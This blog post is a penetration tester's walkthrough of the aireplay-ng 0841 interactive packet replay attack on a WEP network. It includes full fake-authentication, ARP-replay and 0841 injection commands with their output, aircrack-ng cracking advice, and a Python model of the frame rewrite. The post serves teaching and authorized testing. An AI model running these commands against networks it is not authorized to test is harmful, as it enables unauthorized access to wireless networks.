This week I wanted to cover the aireplay 0841 attack, or interactive packet replay. I know that this is yet another wireless post, but I've been on a few wireless engagements recently!
Aireplay 0841 Attack - Introduction
For those of you not familiar, interactive packet replay is a WEP attack in which aireplay-ng re-injects a data frame it captured from the target network instead of waiting for a client to send an ARP request. The "0841" variant rewrites that frame so the access point treats it as coming from an associated client and destined for broadcast; the AP decrypts it, finds a valid ICV, and re-broadcasts it under a new IV every time, which is exactly the IV material aircrack-ng needs. It is the fallback for when ARP replay is not available/working, for example when there are no clients on the network generating ARP traffic.
If you would like some more information, then you can also read the following write-up.
Attempting ARP Replay
First, I sent a fake authentication request to the target access point.
root@kali:~# aireplay-ng -1 0 -e TargetAP -a FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
18:07:45  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11
18:07:45  Sending Authentication Request (Open System) [ACK]
18:07:45  Authentication successful
18:07:45  Sending Association Request [ACK]
18:07:45  Association successful :-) (AID: 1)
Next, I attempted an ARP Replay attack. Unfortunately, I received 0 ARP requests even after 205,000 packets.
root@kali:~# aireplay-ng --arpreplay -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
18:03:37  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-1031-180337.cap
You should also start airodump-ng to capture replies.
Read 205379 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
^C
Enter the Aireplay 0841 Attack
As an ARP Replay attack was not working, it was time to try the 0841 attack.
With -2 (interactive replay), aireplay-ng reads frames off the air and offers each WEP data frame from the target BSSID as a replay candidate. The two options that make this the "0841 attack" rewrite the candidate before it is re-sent: -p 0841 overwrites the frame control field with 0x0841 (a data frame with the ToDS and WEP bits set, i.e. a frame that looks like it came from an associated station, which is why the fake authentication with -h above was needed first), and -c FF:FF:FF:FF:FF:FF sets the destination to the broadcast address. The encrypted body is left byte-for-byte intact, so the AP decrypts it, finds a valid ICV, and re-broadcasts it under a fresh IV. Any WEP data frame from the BSS will do: the one captured below was actually a FromDS frame (frame control 0842, FromDS: 1, ToDS: 0), and aireplay-ng turned it into a ToDS one. Once a packet was offered, hitting the "y" key saved it and started replaying it on the network.
root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
Read 856 packets...

        Size: 118, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  FC:5B:xx:xx:xx:xx
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  4C:34:88:2C:23:6A

        0x0000:  0842 0000 ffff ffff ffff fc5b 3969 0062  .B.........[9i.b
        0x0010:  4c34 882c 236a 3058 713d 8a80 82c7 724b  L4.,#j0Xq=....rK
        0x0020:  df97 716b 5223 a570 e093 b405 faac bde5  ..qkR#.p........
        0x0030:  74bf 43d5 8047 377f c79c cbf4 b8e3 48e3  t.C..G7......H.
        0x0040:  07e7 18f5 6ce9 b454 d6a4 1f46 acf9 81fd  ....l..T...F....
        0x0050:  b5d3 299b 55e4 6a85 cb35 cc17 2cfe ea13  ..).U.j..5..,...
        0x0060:  32d8 0f9e 8990 cb3f 2b01 1ea1 b3d0 7f64  2......?+.....d
        0x0070:  51e6 e547 06ab                           Q..G..

Use this packet ? y

Saving chosen packet in replay_src-1031-180750.cap
You should also start airodump-ng to capture replies.
Sent 27144 packets...(499 pps)
As you can see, I was now receiving data packets (albeit a bit slowly) on the network!
 CH 11 ][ Elapsed: 12 mins ][ 2017-10-31 18:10

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AU

 FC:5B:xx:xx:xx:xx  -32   2     3412      116    0  11  54e. WEP  WEP40  OP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 FC:5B:xx:xx:xx:xx  00:C0:CA:8D:89:75    0    9 - 1   4858    74695
Unfortunately, I was unable to crack this specific key even after 50k IVs. That said, you crack the capture with aircrack-ng the same way you would any other WEP pcap file, e.g. aircrack-ng -b FC:5B:xx:xx:xx:xx against the airodump-ng capture. One caveat worth knowing: aircrack-ng's default PTW attack was designed around ARP frames, and the 0841 replay only produces copies of whatever frame you chose, so if PTW refuses to converge on such a capture, retry with the KoreK attacks (-K), which need more IVs but are not tied to the frame type.
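To make the header rewrite and the AP's side of the exchange concrete, here is an added example that is not part of the original post and not aircrack-ng code: a small Python model of what `-2 -p 0841 -b <bssid> -h <smac> -c FF:FF:FF:FF:FF:FF` does to a captured frame, followed by a toy access point that decrypts the relayed frame, checks the ICV, and re-broadcasts it under a fresh IV. The WEP key, the BSSID, the client MAC, the IVs and the captured frame are all constructed for the example (only 00:C0:CA:8D:89:75, the injecting card from the commands above, is taken from the post); `rc4`, `wep_encrypt`, `wep_decrypt` and `ap_relay` are illustrative helpers written for this page, not library calls.

```python
import struct
import zlib

# Constructed values for the example. Only SMAC comes from the post's commands.
KEY = bytes.fromhex("0102030405")          # 40-bit WEP key (WEP40), constructed
BSSID = bytes.fromhex("fc5b000000aa")      # placeholder for FC:5B:xx:xx:xx:xx
CLIENT = bytes.fromhex("020000000001")     # a station the AP originally talked to
SMAC = bytes.fromhex("00c0ca8d8975")       # our card, fake-authenticated via -1
BROADCAST = bytes.fromhex("ffffffffffff")  # what -c FF:FF:FF:FF:FF:FF puts in DA
HDR = 24  # 802.11 data header without QoS: FC, duration, 3 addresses, seq ctrl


def parse_frame_control(frame):
    """Decode the 2-byte frame control: 0x0842 = FromDS+WEP, 0x0841 = ToDS+WEP."""
    b0, flags = frame[0], frame[1]
    return {"type": (b0 >> 2) & 0x3, "subtype": b0 >> 4,
            "to_ds": bool(flags & 0x01), "from_ds": bool(flags & 0x02),
            "protected": bool(flags & 0x40)}


def addresses(frame):
    """Map Addr1..3 onto BSSID/SA/DA according to the DS bits."""
    fc = parse_frame_control(frame)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if fc["from_ds"] and not fc["to_ds"]:
        return {"da": a1, "bssid": a2, "sa": a3}
    if fc["to_ds"] and not fc["from_ds"]:
        return {"bssid": a1, "sa": a2, "da": a3}
    raise ValueError("only plain FromDS or ToDS data frames are handled here")


def rewrite_0841(frame, bssid, smac, dmac=BROADCAST):
    """Model of -p 0841 -b -h -c: new header, encrypted body byte-for-byte intact."""
    hdr = bytearray(frame[:HDR])
    hdr[0], hdr[1] = 0x08, 0x41                             # data frame, ToDS + WEP bits
    hdr[4:10], hdr[10:16], hdr[16:22] = bssid, smac, dmac   # Addr1=BSSID, Addr2=SA, Addr3=DA
    return bytes(hdr) + frame[HDR:]


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); used here only to model WEP, not for anything real."""
    s, j, out = list(range(256)), 0, bytearray()
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext, key_id=0):
    """WEP body: IV(3) | key id | RC4(IV||key, plaintext || CRC32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv)


def wep_decrypt(key, body):
    """Return the plaintext, or None when the ICV fails (an AP drops such frames)."""
    clear = rc4(body[:3] + key, body[4:])
    plaintext, icv = clear[:-4], clear[-4:]
    return plaintext if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) == icv else None


def wep_iv(frame):
    return frame[HDR:HDR + 3]


def ap_relay(key, frame, fresh_iv, associated):
    """Toy AP: accept a ToDS WEP frame from an associated station, verify the ICV,
    re-encrypt the plaintext under a fresh IV and send it back out FromDS.
    Returns None whenever a real AP would simply drop the frame or not put it on air."""
    fc, addr = parse_frame_control(frame), addresses(frame)
    if not (fc["to_ds"] and fc["protected"]) or addr["sa"] not in associated:
        return None                  # unassociated SA: this is why the -1 fake auth step matters
    if not addr["da"][0] & 0x01:
        return None                  # unicast DA goes to the wire or to one station; broadcast reliably comes back on air
    plaintext = wep_decrypt(key, frame[HDR:])
    if plaintext is None:
        return None                  # ICV failure: the body must be replayed untouched
    hdr = bytearray(frame[:HDR])
    hdr[0], hdr[1] = 0x08, 0x42      # FromDS + WEP
    hdr[4:10], hdr[10:16], hdr[16:22] = addr["da"], addr["bssid"], addr["sa"]
    return bytes(hdr) + wep_encrypt(key, fresh_iv, plaintext)


def build_captured_frame(key):
    """Constructed FromDS frame standing in for the 0842 packet aireplay-ng offered."""
    payload = bytes.fromhex("aaaa030000000806") + bytes(28)   # LLC/SNAP header + dummy body
    hdr = bytes.fromhex("08420000") + BROADCAST + BSSID + CLIENT + bytes.fromhex("0010")
    return hdr + wep_encrypt(key, bytes.fromhex("0a0b0c"), payload)


def demo():
    """Capture -> rewrite as 0841 -> AP relays it with a new IV. Returns all three frames."""
    captured = build_captured_frame(KEY)
    injected = rewrite_0841(captured, BSSID, SMAC)
    relayed = ap_relay(KEY, injected, bytes.fromhex("0a0b0d"), {SMAC})
    return captured, injected, relayed


if __name__ == "__main__":
    for name, f in zip(("captured", "injected", "relayed"), demo()):
        print(name, f[:2].hex(), parse_frame_control(f), "IV", wep_iv(f).hex())
```

The model makes the three failure modes visible: the original FromDS frame is ignored by the AP (it is not a ToDS frame), a ToDS frame from a MAC that never associated is dropped (hence the fake authentication), and any change to the encrypted body breaks the ICV. Only the untouched body with a rewritten header comes back out with a new IV, which is what airodump-ng counts under #Data.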
Aireplay 0841 Attack - Conclusion
While I wasn't able to crack this particular key, hopefully you were able to learn a new WEP attack.
Next week will finally be a non-wireless post, so be on the lookout!